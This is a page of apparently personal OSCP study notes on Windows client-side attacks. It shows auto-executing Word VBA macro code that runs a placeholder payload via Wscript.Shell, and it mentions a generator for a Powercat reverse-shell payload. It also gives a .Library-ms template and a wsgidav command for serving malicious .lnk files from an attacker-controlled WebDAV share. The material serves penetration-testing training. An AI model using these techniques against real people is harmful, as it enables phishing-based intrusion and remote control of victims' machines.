🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • Exploiting Microsoft Office
  • Exploiting Windows Library Files
  • References
  1. Windows

Client Side

PreviousDC SyncNextNTLM Authentication

Last updated 8 months ago

Exploiting Microsoft Office

Steps to reproduce the doc macros attack using vba script

  1. Create new file using Microsoft Word.

  2. Create a new macro - View > Macros:

  3. Give the macro name > Select Macros in document > Click on Create:

  1. Write the Macro script within the payload:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = <Payload>
    CreateObject("Wscript.Shell").Run Str
End Sub

  1. Save the file in doc\docm format which considered less secured, so the victim will just need to press enable to initiate the macros .

I've created useful python script which generates the VBA script content with Powercat Revshell payload given Local Host and Port:

python3 vba-powercat-revshell.py <local_host> <ip>

Exploiting Windows Library Files

Libraries are virtual containers for users' content.

This attack leverage .Library-ms file which will connect to attacker controlled WebDAV and be sent to a victim. Once the victim opens the file, he will think the WebDAV is a local windows folder. Then in the next stage the victim will click a malicious .lnk file using the WebDAV.

First creating the .Library-ms file: 

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

  • <libraryDescription>: This is the root element that defines the overall structure of a Windows library configuration.

  • <name>: Refers to a string identifier for the library.

  • <version>: Specifies the version of the library schema.

  • <isLibraryPinned>: Indicates whether the library is pinned in the user's navigation pane.

  • <iconReference>: Points to the resource for the icon associated with the library.

  • <templateInfo>: Contains metadata about the library's folder type template.

  • <folderType>: Defines the folder type or classification of the library using a GUID, which influences its behavior and appearance. These tag determine the columns and details that appear in Windows Explorer.

  • <searchConnectorDescriptionList>: A wrapper for a collection of search remote connectors that the library can use.

  • <searchConnectorDescription>: Defines individual search connectors, specifying details like save location and support status.

  • <isDefaultSaveLocation>: Indicates whether this search connector is the default location for saving files, set to true here.

  • <isSupported>: used for compatibility.

  • <simpleLocation>: Specifies the search connector’s location in a simplified format.

  • <url>: Points to the URL of the attacker's WebDAV server.

Serving the WebDAV Server including malicious files such .lnk file that runs PowerShell.

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root <directory_to_serve>

References

Windows Libraries - Windows Client ManagementMicrosoftLearn
Logo